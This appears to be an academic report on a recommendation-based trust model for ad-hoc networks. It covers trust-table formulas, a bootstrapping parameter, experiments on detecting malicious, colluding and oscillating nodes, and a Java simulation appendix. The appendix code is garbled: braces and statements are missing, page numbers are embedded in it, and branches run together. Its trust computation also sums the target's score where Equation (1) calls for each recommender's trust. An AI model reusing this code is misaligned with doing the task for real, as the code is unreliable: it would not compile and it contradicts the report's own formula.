In this work we consider attacks only on the application and transport layers. We are not concerned with attacks on the network layer (routing attacks). Nodes are divided into several categories according to their behavior. Selfish nodes are nodes which are not willing to collaborate with other nodes. Careless nodes are nodes which give random recommendations instead of true ones. Malicious nodes are nodes which might attack other nodes and cause damage. Oscillating nodes are nodes which have oscillating behavior: for example, behaving well for some time to gain high trust and then starting to attack, or a trusted node which is hacked or compromised by a virus or a malicious node. Trusted nodes are nodes which behave exactly as others expect them to behave. The most important of all are the malicious nodes and the oscillating nodes, because they are the most dangerous ones. In our model we consider several activities as attacks:
• Sending malicious code to a node asking for collaboration.
• Overusing the collaborating node’s resources.
• Using an unauthorized resource from the collaborating node.
• Breaching or compromising the collaborating node’s privacy.

4.3.
Details of the Proposed Model
This section describes the proposed trust model and provides the metrics for assessing trust in the network. The trust value computation is based on peer recommendations and past interaction experience. Past interaction experience is an aggregate measure of the quality of prior collaborations. The following discussion does not differentiate between service provider and service requester, because either of them can be malicious or honest at some point in time.

Each peer i maintains a Table of Trust (ToT) in which each row corresponds to one peer that i interacted with in the past. The table stores:
• The peer ID.
• The Past Interaction Experience (PIE) value, which corresponds to the quality of past interactions with the hosting peer.
• The number of times N that peer i interacted with peer j.

Figure 4: Table of Trust

ID        PIE     # Interactions
19AFC34   0.765
12DE542   0.456
345FAD1   0.823
…

The trust value of peer i in peer j is not necessarily the same as the trust value of peer j in peer i. To compute how much trust peer i has in peer j, peer i asks other peers about their trust in j. Each peer k submits its recommendation (opinion) as a trust value, and the collected values are weighted by how much i trusts the submitting peers.

The trust table ToT will be used by the hosting peer i in one of the following cases:
• If peer j offers a service that peer i requested, and the requested service is available from more than one service provider, peer i chooses the most trusted peer to deal with.
• If peer i receives a request from peer j to use the services available at peer i, peer i consults its ToT to decide whether it will offer its service to peer j or not.
• If peer k requests advice from peer i on whether it should collaborate with peer j, peer i sends the trust value that corresponds to peer j from its ToT.
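The ToT described above maps naturally onto a small per-node data structure. The following Python sketch is illustrative only (the class and method names are ours, not those of the simulator in Appendix I):

```python
from dataclasses import dataclass, field


@dataclass
class TrustTable:
    """Per-peer Table of Trust (ToT): one row per peer interacted with."""
    pie: dict = field(default_factory=dict)           # peer_id -> PIE value
    interactions: dict = field(default_factory=dict)  # peer_id -> N

    def record(self, peer_id: str, pie_value: float) -> None:
        # Create or update the row for peer_id and count the interaction.
        self.pie[peer_id] = pie_value
        self.interactions[peer_id] = self.interactions.get(peer_id, 0) + 1


# Rows mirroring the PIE values shown in Figure 4.
tot = TrustTable()
tot.record("19AFC34", 0.765)
tot.record("12DE542", 0.456)
tot.record("345FAD1", 0.823)
```

Note that the table is asymmetric by construction: each peer keeps its own `TrustTable`, so peer i's row for j is independent of peer j's row for i.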
The trust value is affected and updated when one of the following occurs:
• After the completion of a service request from peer j, peer i might change the trust value of peer j depending on the experience. Peer i demotes the trust in peer j if the performance of the system gets affected during the service or right after it, e.g., if one of the resources slows down or becomes unavailable. Peer i can have an IDS which detects unusual behavior or attempts to overuse or access resources without permission.
• After peer i asks for service access from peer j, peer i's trust value in peer j will be updated to reflect the quality of the collaboration. If the service was successful, the trust value for peer j will be promoted. If the service was not completed or resulted in damage (e.g., a virus), that value will be demoted.

More formally, a peer i uses T_i(j) to decide whether to collaborate with peer j or not. T_i(j) is computed as follows:

T_i(j) = (1 − α) × PIE_i(j) + α × [ Σ_{k=1..M} T_i(k) × PIE_k(j) ] / [ Σ_{k=1..M} T_i(k) ]      (1)

Where:
• T_i(j) is a value that reflects the trust of peer i in peer j.
• PIE_i(j) is a value that peer i maintains and that reflects past interactions with peer j.
• α (the weight of second-hand experience) is a weight for others’ recommendations; it is a real number between 0 and 1.
• M is the number of peers contacted by peer i to give their recommendations.

The parameter α can be tuned to give more or less importance to peer recommendations with respect to past interactions. Note that T_i(j) is not stored in the ToT, but it is used to update the value of PIE and to decide whether to collaborate or not. If T_i(j) is greater than a pre-defined threshold, T_acc, collaboration is accepted; otherwise it is rejected.

4.4. Bootstrapping
Another important parameter is the initialization of the trust values in the ToT, i.e., the bootstrapping issue. The model initializes the PIE values for all peers to T_acc + δ, where δ is a positive parameter.
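Equation (1) can be expressed directly in code. The following Python sketch is ours (function name, threshold, and example values are illustrative, not from the report):

```python
def trust(pie_ij, recommendations, alpha):
    """Compute T_i(j) per Equation (1).

    pie_ij: peer i's own past-interaction experience with j, PIE_i(j).
    recommendations: list of (T_i(k), PIE_k(j)) pairs from the M peers asked.
    alpha: weight of second-hand experience, 0 <= alpha <= 1.
    """
    if not recommendations:
        return pie_ij  # no second-hand evidence: rely on own experience
    weighted = sum(t_ik * pie_kj for t_ik, pie_kj in recommendations)
    total_weight = sum(t_ik for t_ik, _ in recommendations)
    return (1 - alpha) * pie_ij + alpha * weighted / total_weight


# Decision rule: collaborate only if trust exceeds the threshold T_acc.
T_ACC = 0.5
t = trust(0.8, [(0.9, 0.7), (0.6, 0.4)], alpha=0.3)  # 0.7*0.8 + 0.3*(0.87/1.5)
collaborate = t > T_ACC
```

With these illustrative numbers, the recommendation term is 0.87/1.5 = 0.58, giving t = 0.56 + 0.174 = 0.734, so collaboration is accepted.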
After each collaboration experience, an Intrusion Detection System (IDS) determines whether the collaboration was successful or not. Since the IDS might fail to detect some of the attacks, it is modeled by a probabilistic function. After every collaboration, the value of PIE is updated using a reward-punishment heuristic to limit the impact of malicious peers and eventually expel them. The value of PIE_i(j), which is maintained by peer i and reflects the trust of peer i in peer j, is updated as follows.

Let S and N denote the number of successful collaborations and the total number of collaborations between peer i and peer j, respectively. Let PIE_i(j)_old be the value that corresponds to all peer i’s prior experiences with peer j. We define PIE_i(j)_old as the fraction S/N.

Case of unsuccessful collaboration: the number of successful collaborations S remains the same, while the total number of collaborations N increases. This means that:

PIE_i(j)_new = S / (N + 1)

Hence, we have:

PIE_i(j)_new = (S / N) × N / (N + 1)

Finally, we get:

PIE_i(j)_new = PIE_i(j)_old × N / (N + 1)      (2)

Case of successful collaboration: in this case, both the number of successful collaborations and the total number of collaborations increase, thus:

PIE_i(j)_new = (S + 1) / (N + 1)

Finally:

PIE_i(j)_new = (PIE_i(j)_old × N + 1) / (N + 1)      (3)

Note that after any kind of collaboration, N increases by 1. If T_i(j) < T_acc, then PIE_i(j) is demoted according to Equation (2), and no collaboration takes place between peer i and peer j. The decision whether to demote or promote PIE is made by the intrusion detection system, depending on the quality of the collaboration. Note that, in general, T_acc can be different from one peer to another.

When a node joins the network and does not have previous knowledge about any of the nodes in the network, it may face some bootstrapping issues. If it gives all other nodes a low PIE, it will not interact with anyone. If it gives all nodes a high PIE, it will be at high risk. To solve this problem we introduce an initialization parameter, delta (δ), which is used to initialize PIE.
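Equations (2) and (3) reduce to one compact reward-punishment update. A Python sketch (function name and example values are ours):

```python
def update_pie(pie_old, n, successful):
    """Reward-punishment update of PIE after the (n+1)-th collaboration.

    With PIE defined as S/N (successes over total collaborations):
      failure : PIE_new = S/(N+1)     = PIE_old * N / (N+1)        (Eq. 2)
      success : PIE_new = (S+1)/(N+1) = (PIE_old * N + 1) / (N+1)  (Eq. 3)
    """
    if successful:
        return (pie_old * n + 1) / (n + 1)
    return pie_old * n / (n + 1)


pie = 0.5  # e.g. S = 2 successes out of N = 4 collaborations
pie_fail = update_pie(pie, 4, successful=False)  # 2/5
pie_ok = update_pie(pie, 4, successful=True)     # 3/5
```

One useful property of this heuristic: a single failure at low N is very punishing (from N = 1, one failure halves PIE), while a long honest history makes PIE harder to move, which matches the intended reward-punishment behavior.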
The PIE of all nodes is initialized to T acc + δ; δ has to be set carefully so that interactions will happen while the situation is not too risky.

Figure 5: Collaboration flow diagram

If an honest node was compromised and then recovered, it will be very difficult to make other nodes trust it again. We propose a method to solve this issue: listening to the recommendations of the oscillating node without interacting with it. If the recommendations given by the oscillating node are accurate, its PIE is promoted; that is, if the oscillating node says someone is good and that node really is good, its PIE is promoted, and likewise if it says that someone is bad and that node really is bad.

The most important measure for such a model is how fast it can detect all the malicious nodes in the network. The other important measures are whether it can detect all the malicious nodes without flagging non-malicious nodes as malicious (false rejection rate) and without missing a malicious node (false acceptance rate). We consider the number of interactions with malicious nodes as our measure of how fast the model can detect the malicious nodes (risky interactions): we want to detect all malicious nodes with the minimum number of interactions with them, so that the network is as safe as possible. Risky interactions are defined as the number of interactions with malicious nodes until the detection of all malicious nodes. The percentage of risky interactions is calculated as the ratio between the number of interactions with malicious nodes until the detection of all malicious nodes and the total number of interactions until detection. We define the speed of detecting a malicious node as the slope of the change of its average PIE over all honest nodes: if we take one malicious node and observe the change of its PIE in all honest nodes, it will eventually go below T acc, and the slope of this change indicates how fast honest nodes can detect it.
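The listen-only recovery rule can be sketched like this. The paper's appendix does not include this exact helper; the class name, the constant TACC, and the agreement test are our assumptions.

```java
// Illustrative sketch of re-trusting a recovered oscillating node by
// scoring its recommendations instead of interacting with it.
public class RecoverySketch {
    static final double TACC = 0.5; // assumed acceptance threshold

    // Promote the recovered node's PIE when its recommendation about a
    // third party agrees with our own verdict (both above Tacc or both
    // below); demote it otherwise. Reuses the incremental PIE update.
    static double scoreRecommendation(double pie, int n,
                                      double itsRecommendation,
                                      double ourOwnTrust) {
        boolean agrees =
            (itsRecommendation >= TACC) == (ourOwnTrust >= TACC);
        double scaled = pie * ((double) n / (n + 1)); // demoted value
        return agrees ? scaled + 1.0 / (n + 1) : scaled;
    }

    public static void main(String[] args) {
        // The oscillator (PIE 0.4 after 4 observations) says a peer is
        // good (0.9) and we also rate that peer good (0.8): promote.
        System.out.println(scoreRecommendation(0.4, 4, 0.9, 0.8));
        // It says another peer is good (0.9) but we rate it bad (0.2):
        // demote.
        System.out.println(scoreRecommendation(0.4, 4, 0.9, 0.2));
    }
}
```

Because the evaluator never collaborates with the oscillating node during this phase, accurate recommendations rebuild its PIE at no risk to the evaluator.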
6. Experiments

A node is modeled as a data structure which consists of a table to store PIEs (ToT), a table to store the number of interactions with the corresponding nodes, and an ID for the node. The network is modeled as a collection of nodes and is initialized such that no two nodes have interacted with each other before. We do not consider the mobility of the nodes in our experiments, as it does not affect the performance of trust at the application layer. We assume that every node has IDS software installed that can detect malicious activities with some probability; thus we model the IDS as a probabilistic variable. The attacks we consider are those addressed by IDS systems, such as privacy compromise, sending malicious code, and unauthorized access. The simulation proceeds as follows:

- Initialize all the nodes in the system: set the PIE toward all nodes to T acc + δ; set the interaction count with all nodes to 1 (not zero, because zero would cause a division error in the trust calculation); set the success count with all nodes to zero.
- Randomly choose nodes to be malicious (m malicious nodes).
- Start the simulation. Choose two nodes randomly to interact with each other. Update the trust: take advice and calculate the trust. If the trust is less than T acc, do not interact and demote PIE. If the trust is greater than T acc, interact and then consult the IDS: if the collaboration was successful, promote PIE; else demote PIE. Check for nodes whose PIE is less than T acc according to all trusted nodes and append them to an array. If a caught node is really malicious, increment k. Loop until k equals the number of malicious nodes in the system.
- Check for false positives.

In this experiment we try to see how implementing the system in a network improves its performance. The measure used here is the number of risky interactions; the defenseless network is stopped at the same number of total interactions at which the fortified network detects all malicious nodes.
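The simulation steps above can be sketched as a single loop. This is a heavily simplified sketch of the procedure, not the appendix code: it fixes the malicious IDs, assumes a perfect IDS (zero error rate), and omits the second-hand-advice step; all names are our own.

```java
import java.util.Random;

// Simplified sketch of the detection simulation: PIEs are promoted or
// demoted until every honest node rates every malicious node below Tacc.
public class SimSketch {
    public static int simulate(int nodes, int malicious, double tacc,
                               double delta, long seed) {
        double[][] pie = new double[nodes][nodes];
        int[][] n = new int[nodes][nodes];
        for (int i = 0; i < nodes; i++)
            for (int j = 0; j < nodes; j++) {
                pie[i][j] = tacc + delta; // bootstrap value
                n[i][j] = 1;              // 1, not 0, to avoid divide-by-zero
            }
        boolean[] mal = new boolean[nodes];
        for (int i = 0; i < malicious; i++) mal[i] = true; // fixed, for simplicity

        Random rand = new Random(seed);
        int interactions = 0;
        while (!allDetected(pie, mal, tacc)) {
            int a = rand.nextInt(nodes), b = rand.nextInt(nodes);
            if (a == b) continue;
            interactions++;
            boolean success = !mal[b]; // perfect IDS: malicious target => failure
            double scaled = pie[a][b] * ((double) n[a][b] / (n[a][b] + 1));
            pie[a][b] = success ? scaled + 1.0 / (n[a][b] + 1) : scaled;
            n[a][b]++;
        }
        return interactions;
    }

    // All malicious nodes detected when every honest node's PIE toward
    // each of them has dropped below Tacc.
    static boolean allDetected(double[][] pie, boolean[] mal, double tacc) {
        for (int j = 0; j < mal.length; j++) {
            if (!mal[j]) continue;
            for (int i = 0; i < mal.length; i++)
                if (!mal[i] && i != j && pie[i][j] >= tacc) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // 20 nodes, 2 malicious, Tacc 0.5, delta 0.2, fixed seed
        System.out.println(simulate(20, 2, 0.5, 0.2, 42L));
    }
}
```

The returned count plays the role of the total interactions until detection; comparing it with the interactions that involved a malicious target would give the percentage of risky interactions defined above.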
The IDS was responsible for deciding whether an interaction was successful or not. This experiment was done on a network with 50 nodes. The weight of the second-hand experience was 0.5 and the initialization distance was 0.5 as well. The IDS error rate was set to zero, which is not realistic, but we needed to isolate the effect of the IDS to focus on the detection rate.

[Figure: % malicious nodes vs. % risky interactions]

In this section two experiments were carried out. The first experiment measures the speed of detection of a malicious node in an environment where malicious nodes do not cooperate. The second measures the speed of detecting a malicious node in an environment where malicious nodes cooperate. Malicious nodes cooperate by giving their fellow malicious nodes high recommendations when they are asked for their opinions, and by giving low recommendations when asked about honest nodes. This experiment was done on a network with 50 nodes, 5 of which are malicious. T acc was set to 0.5 and the weight of the second-hand experience was set to 0.5 as well. The PIEs in the table of trust of all nodes were initialized to T acc + 0.2. The IDS error rate was set to 0, which is not realistic, but we need to isolate other parameters to get a benchmark for the slope of the changing PIE. In this experiment we assume that malicious nodes attack but do not lie when they are asked for their recommendations.

[Figure: speed of detecting a malicious node — average PIE vs. number of interactions]

As seen from the graph above, after around 30 interactions the average PIE of the malicious node dropped below T acc. Since we have 50 nodes and 5 of them are malicious, we have 45 honest nodes, and only 30 of them had to interact with this malicious node in order for all of them to detect it. The next experiment measures the speed of detecting a cooperating malicious node.
The measure used is the average PIE of one of the cooperating malicious nodes. The cooperation of malicious nodes is that they give other malicious nodes high recommendations and give honest nodes low recommendations. We define a parameter called the lying distance, where malicious nodes give recommendations of T acc + lying distance or T acc − lying distance. This experiment was done on a network with 50 nodes, 5 of which are malicious. The weight of the second-hand experience was 0.5 and T acc was 0.5 as well. The initialization distance was set to 0.2, the lying distance was set to 0.4, and the IDS error rate was zero.

[Figure: speed of detecting a collaborating malicious node]

As noticed from the graph above, the malicious node is detected after about 40 interactions. The number of interactions needed in this case is higher than in the previous one, because when a node asks about a malicious node it gets a higher rating thanks to its friends' help. However, even with this malicious collaboration all malicious nodes are detected, and detection of each node by all honest nodes requires each honest node to collaborate with it only once.

6.5. Speed of detecting a malicious oscillating node

This experiment measures the speed of detecting an oscillating malicious node, which is a malicious node that acts honestly for a while and then starts attacking. It was modeled as a node which starts as honest and, when its average PIE goes above 0.8, turns malicious. The experiment was done on a network with 25 nodes, 1 of which is oscillating. The weight of the second-hand experience was set to 0.5 and T acc was set to 0.5 as well. The initialization distance was 0.2 and the IDS error rate was zero.

[Figure: speed of detecting an oscillating malicious node vs. number of risky interactions]

As noticed from the graph above, the oscillating node reached an average PIE above 0.8 after about 20 interactions.
After that it started acting maliciously, and it was detected after fewer than 40 interactions, which is very good given that it had obtained a very high rating before attacking.

The next experiment measures the speed of recovering an honest node which was compromised and then recovered. The speed of recovery is measured by the change of the average PIE of this node from the point of view of all other honest nodes. This experiment was done on a network with 25 nodes, 1 of which was an oscillating node. The weight of the second-hand experience was set to 0.5 and T acc was 0.5 as well. The initialization distance was 0.2 and the IDS error rate was zero.

[Figure: speed of recovering an honest oscillating node vs. number of risky interactions]

As noticed from the graph above, the node's average PIE goes below T acc after about 50 interactions. Then, when the node recovers, it needs about 30 interactions in order for the other nodes to trust it again.

The next experiment measures the change of the IDS error rate versus the percentage of risky interactions. Our model depends heavily on the accuracy of the IDS, because it is the component that measures the quality of each interaction. This experiment was done on a network with 25 nodes, 4 of which are malicious. The weight of the second-hand experience was set to 0.5 and T acc was 0.5 as well. The initialization distance was set to 0.2 and the IDS error rate was varied.

[Figure: IDS error rate vs. percentage of risky interactions]

As noticed from the above graph, as the IDS error rate increases, the number of risky interactions increases exponentially. However, it stays reasonable up to a 15% IDS error rate.

6.5.3. Weight of second hand experience vs. percentage of risky interactions

This experiment measures the effect of changing the weight of the second-hand experience on the percentage of risky interactions. It is done on a network with 50 nodes, 10 of which are malicious. The initialization distance was set to 0.2 and T acc was set to 0.5.
The IDS error rate was set to zero and the weight of the second-hand experience was varied from 0 to 1 in increments of 0.05. The malicious nodes cooperate by giving their friends T acc + 0.4 when they are asked for their opinion, and giving the others T acc − 0.4. If the malicious nodes did not lie when asked for their opinion, the weight of the second-hand experience would have no effect on the system, because all the opinions would be honest and it would not matter how much weight is given to each one.

[Figure: weight of second-hand experience vs. % risky interactions]

As noticed from the graph above, when a node depends more on others' opinions and many of them are lying, the percentage of risky interactions increases. This means that in such an environment it is better to choose a lower weight of second-hand experience.

In this work, we developed a trust model for ad-hoc networks. The main concern of this model is to provide a trustful community that can find and eliminate malicious nodes. We also focus our efforts on the level of services provided by or required by a node, rather than on forwarding or receiving packets; this makes our work different from the main stream of trust models found in the literature. Our model encourages honest collaborations and has a very high detection rate of malicious nodes. Through conducting several experiments, we could prove the robustness of our model. Our main contribution to the literature is our method of detecting oscillating nodes and collaborative attackers.
Class ToT

import java.util.Hashtable;

public class ToT {

    private class pair {
        double PIE;
        int numOfInteractions;

        public pair(double PIE, int inter) {
            this.PIE = PIE; // "this." is required: plain "PIE = PIE" is a self-assignment
            numOfInteractions = inter;
        }
    }

    private Hashtable<Integer, pair> table;

    public ToT() {
        table = new Hashtable<Integer, pair>();
    }

    public void add(int id, double p, int in) {
        table.put(id, new pair(p, in));
    }

    public double getPIE(int ID) {
        return table.get(ID).PIE;
    }

    public int getNumOfInteractions(int ID) {
        return table.get(ID).numOfInteractions;
    }

    public void update(int id, double newPIE, int newNumOfInt) {
        table.remove(id);
        table.put(id, new pair(newPIE, newNumOfInt));
    }
}

Class node

import java.util.Random;

public class node {
    /** weight of the second hand experience */
    private static double a;
    /** Table of trust as a hashtable where the keys are the nodes' IDs */
    private ToT ToT;
    /** number of neighbors */
    private static int N;
    /** Minimum accepted trust */
    private static double Tacc;
    /** boolean to set malicious nodes */
    private boolean mal;
    /** Mode of lying: n - no lying, r - random recommendations,
        d - distance lying (+ for friends, - for others) */
    private static char lying;
    /** distance of lying in case of lying mode d */
    private static double dl;
    /** initialization distance */
    private static double d;
    /** the node's ID */
    private int ID;
    /** IDS error rate */
    private static double IDSError;
    /** honest oscillating: honest node that was compromised */
    private boolean osHon;
    /** malicious oscillating: acts well to gain trust, then attacks */
    private boolean osMal;

    public node(int id) {
        ID = id;
        ToT = new ToT();
    }

    /**
     * initializes the table of trust of the node
     * @param neighbors
     */
    public void initializeToT(node[] neighbors) {
        Random rand = new Random(System.currentTimeMillis());
        int i = 0;
        if (mal) {
            if (lying == 'n') {
                for (i = 0; i < neighbors.length; i++)
                    if (neighbors[i].getID() != this.ID)
                        ToT.add(neighbors[i].getID(), Tacc + d, 1);
            } else if (lying ==
'r') { for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != this.ID) ToT.add(neighbors[i].getID(), rand.nextDouble(), 1); else if (lying == 'd') { for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != this.ID) { if (!neighbors[i].isMal()) { ToT.add(neighbors[i].getID(), Tacc + dl, 1); } else if (neighbors[i].isMal()) { ToT.add(neighbors[i].getID(), Tacc - dl, 1); } else if (!mal) { for (i = 0; i < neighbors.length; i++) if (neighbors[i].getID() != this.ID) ToT.add(neighbors[i].getID(), Tacc + d, 1); interact with node i and consult IDS @param i @return true if interaction was successful and false otherwise */ public boolean interact(node i) { if (i.getID() == this.ID) { System.err.println("Error: cannot interact with self"); return false; 35 // double IDS; // Random rand = new Random(System.currentTimeMillis()); // IDS = rand.nextDouble(); /* * if (i.isMal()) { if (IDS >= (1 - IDSError)) return true; else return * false; } else */ return true; promote node i and incerement number of interactions and update ToT */ private void promote(node i) { double newPIE; int newNumOfInt; newNumOfInt = this.ToT.getNumOfInteractions(i.getID()); newPIE = this.ToT.getPIE(i.getID()) * ((double) newNumOfInt / (double) (newNumOfInt + 1)); newPIE += (1.0 / (newNumOfInt + 1)); newNumOfInt++; ToT.update(i.getID(), newPIE, newNumOfInt); demote node i and increment number of interactions if there was one and update ToT @param interacted */ private void demote(node i, boolean interacted) { * ((double) newNumOfInt / (double) (newNumOfInt + 1)); if (interacted) newNumOfInt++; ToT.update(i.getID(), newPIE, newNumOfInt); compute trust, interact with node i if trust > Tacc, consult IDS and @return true if an interaction occured and false otherwise */ public boolean interactAndUpdateTrust(node x, node[] neighbors) { 36 if (x.getID() == this.ID) { System.err.println("Error: cannot interact with self"); return false; double trust; double IDS; int i; Random rand = new 
Random(System.currentTimeMillis()); trust = this.computeTrust(x, neighbors); // System.out.println("trust: " + trust); if (trust < node.Tacc) { if (this.getRecomendation(x) > node.Tacc) this.demote(x, false); return false; } else { if (x.isMal()) IDS = rand.nextDouble(); else IDS = 1; if (IDS >= (1 - IDSError)) { this.promote(x); for (i = 0; i < node.N; i++) { if (neighbors[i].getID() != this.getID() && this.getRecomendation(neighbors[i]) < node.Tacc) if (neighbors[i].getRecomendation(x) >= node.Tacc) this.promote(neighbors[i]); return true; } else { this.demote(x, true); for (i = 0; i < node.N; i++) { if (neighbors[i].getID() != this.getID() && this.getRecomendation(neighbors[i]) < node.Tacc) if (neighbors[i].getRecomendation(x) < node.Tacc) this.promote(neighbors[i]); public double computeTrust(node j, node neighbors[]) { double adviceSum = 0; double trustSum = 0; double trust; int i; for (i = 0; i < neighbors.length; i++) { if (neighbors[i].getID() != ID && neighbors[i].getID() != j.getID()) { adviceSum += ((ToT.getPIE(neighbors[i].getID())) * (neighbors[i] .getRecomendation(j))); trustSum += ToT.getPIE(j.ID); trust = (1.0 - node.a) * (this.ToT.getPIE(j.getID())) + node.a 37 * (adviceSum / trustSum); return trust; public static void setTacc(double acc) { Tacc = acc; public static void setN(int n) { N = n; public static void setAlpha(double r) { a = r; public static void setLying(char x) { lying = x; public static void setLyingDist(double x) { dl = x; public static void setInitDist(double x) { d = x; public boolean isMal() { return this.mal; public boolean isOsMal() { return this.osMal; public boolean isOsHon() { return this.osHon; public void setMal() { mal = true; public void unSetMal() { mal = false; public void setOsMal() { osMal = true; public void setOsHon() { osHon = true; public int getID() { return ID; public void setID(int id) { 38 ID = id; public static void setIDSError(double error) { IDSError = error; public static double getTacc() { return Tacc; 
public static double getDist() { return d; public double getRecomendation(node i) { if (getID() != i.getID()) return ToT.getPIE(i.getID()); else return 0.0; public int getNumOfInteractions(node i) { return ToT.getNumOfInteractions(i.getID()); Class network import java.io.BufferedWriter; import java.io.FileWriter; import java.io.IOException; import java.util.Arrays; import java.util.Random; public class network { private int s;// size of the network private node[] net; private int malicious; private int oscillatingMal; private int oscillatingHon; private int falsePositive; private int rejected_healthy; private char mode; private char oscMode; private final int max = 100000000; // maximum number of allowed // interactions private Random rand; private int testingNodeMal; // the ID of the malicious node that is tested private double avgTrustMal; // the average PIE of the malicious node that is // tested private boolean penalize; // penalize nodes that give worng recommendation // or not private int trials;// ToTal number of tried collaborations private boolean defenseless; public network(String FileName, int n, int m, double a, double tac, double de, int iter, char mod, double tol, char LM, double dis, boolean pen, boolean def, char osmod, int osc) throws IOException { BufferedWriter out = new BufferedWriter(new FileWriter(FileName + ".xls")); double[] rr; int[] mm; int i; int iterations = 0; 40 int tes = 0; int div = iter; rejected_healthy = 0; rand = new Random(System.currentTimeMillis()); penalize = pen; defenseless = def; mode = mod; oscMode = osmod; out .write("\t\t\tnodes\tmalicious\ta\tTacc\tdelta\titerations\t" + "mode\tIDS error\tlying mode\tlying dist\tpenalize\n"); out.write("\t\t\t" + n + "\t" + m + "\t" + a + "\t" + tac + "\t" + de + "\t" + iter + "\t" + mode + "\t" + tol + "\t" + LM + "\t" + dis + "\t" + penalize + "\n"); // change alpha if (mode == 'a') { rr = generateArray(0, 1, 0.05); // double[] rr = {0.5}; out .write("weight of 2nd 
hand\tinteractions\tfalsePositive" + "\trejected healthy\ttrials\n"); for (double r : rr) { System.out.println(r); falsePositive = 0; iterations = 0; div = iter; rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { initializeNetwork(n, r, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; System.out.println(div); out.write(1 - r + "\t" + iterations + "\t" + ((double) falsePositive / (double) div) / s + "\t" + (double) rejected_healthy / (double) (trials - iterations) + "\t" + ((double) trials / (double) div) + "\n"); // change Tacc else if (mode == 't') { rr = generateArray(0.1, 1, 0.01); out .write("Tacc\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (double r : rr) { System.out.println(r); falsePositive = 0; iterations = 0; rejected_healthy = 0; trials = 0; 41 for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, r, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; out.write(r + "\t" + iterations + "\t" + (double) falsePositive / (double) div / s + "\t" + (double) rejected_healthy / (double) (trials - iterations) + "\t" // change number of nodes else if (mode == 'n') { mm = generateArray(10, n, 1); .write("#nodes\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (int r : mm) { System.out.println(r); falsePositive = 0; iterations = 0; rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { this.initializeNetwork(r, a, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; / (double) trials + "\t" + ((double) trials / (double) div) + "\t" + malicious + "\n"); // change number of malisious nodes else if (mode == 'm') { = generateArray(5, m, 5); .write("#malicious\tinteractions\tfalsePositive\trejected" + " healthy\ttrials\n"); for (int r : mm) { System.out.println((int) (n * (r / 100.0))); falsePositive = 0; iterations = 0; 
rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { // System.out.println(i); 42 this.initializeNetwork(n, a, tac, LM, r, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; iterations /= div; trials /= div; out.write(r + "\t" + ((double) iterations / (double) trials) * 100.0 + "\t" + (double) falsePositive / (double) div + "\t" + (double) rejected_healthy + ((double) trials / (double) div) + "\t" + div + "\n"); // change delta else if (mode == 'd') { rr = generateArray(0.0, de, 0.05); out .write("distance\tinteractions\tfalsePositive\trejected" + for (double r : rr) { rejected_healthy = 0; trials = 0; for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, tac, LM, m, dis, 0.5 - r, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; // change IDS error rate else if (mode == 'i') { malicious = m; rr = generateArray(0.0, tol, 0.05); out .write("IDS error\tinteractions\tfalsePositive\trejected" + rejected_healthy = 0; trials = 0; 43 for (i = 0; i < iter; i++) { this.initializeNetwork(n, a, tac, LM, m, dis, de, r, osc); tes = testNetwork(); if (tes < max) iterations += tes; else div--; out.write(r + "\t" + iterations + "\t" + falsePositive + "\t" + (double) rejected_healthy // test avg PIE for a malicious node else if (mode == '-') { iterations = 0; trials = 0; out .write("interactions\tfalsePositive\trejected" + " healthy\ttrials\n"); // System.out.println("********************************\n\n\n\n"); this.initializeNetwork(n, a, tac, LM, m, dis, de, tol, osc); tes = testNetwork(); if (tes < max) iterations += tes; else { // break; div--; iterations /= div; out.write(iterations + "\t" + (double) falsePositive / (double) div / s + "\t" + (double) rejected_healthy / (double) trials + "\t" + ((double) (trials - iterations) / (double) div) + "\n"); System.out.println(); // System.out.println(div); out.close(); public void initializeNetwork(int n, double al, double tacc, char lMode, int mal, double 
lDist, double initDist, double IDSError, int os) { int i; net = new node[n]; s = n; malicious = (int) (n * (mal / 100.0)); oscillatingMal = (int) (n * (os / 100.0)); oscillatingHon = (int) (n * (os / 100.0)); node.setAlpha(al); node.setTacc(tacc); node.setLying(lMode); node.setInitDist(initDist); node.setLyingDist(lDist); node.setIDSError(IDSError); 44 // creating nodes and giving them IDS for (i = 0; i < s; i++) { if (net[i] == null) net[i] = new node(i); // initialize nodes' ToTs for (i = 0; i < s; i++) { net[i].initializeToT(net); // setting malicious nodes int r1; if (oscMode != 'm' && oscMode != 'h') { for (i = 0; i < malicious; i++) { r1 = rand.nextInt(n); if (!net[r1].isMal()) { if (mode == '-') // setting malicious node to test speed // of // detection testingNodeMal = r1; net[r1].setMal(); } else i--; else if (oscMode == 'm') { for (i = 0; i < oscillatingMal; i++) { r1 = rand.nextInt(n); if (!net[r1].isOsMal()) { testingNodeMal = r1; net[r1].setOsMal(); } else if (oscMode == 'h') { for (i = 0; i < oscillatingHon; i++) { r1 = rand.nextInt(n); if (!net[r1].isOsHon()) { testingNodeMal = r1; net[r1].setOsHon(); // System.out.println("finished initialization"); Test Network @param size @param tol 45 * @param A * @return * @throws IOException */ public int testNetwork() throws IOException { BufferedWriter out = new BufferedWriter(new FileWriter( "Trust_change.xls")); out.write("avg PIE\n"); // ***************************************************** // initialize network // ***************************************************** int inter = 0; int i, j; int[] mali = new int[s]; int k = 0;// number of detected nodes inter = 0; int one; int two; boolean interacted = false; int x, y, z, l; boolean bool; z l = 0; for (j = 0; j < s; j++) { mali[j] = s + 1; // ******************************************************* // start interaction // ******************************************************** // System.out.println("Starting reaction."); while (k < malicious && z <= max) 
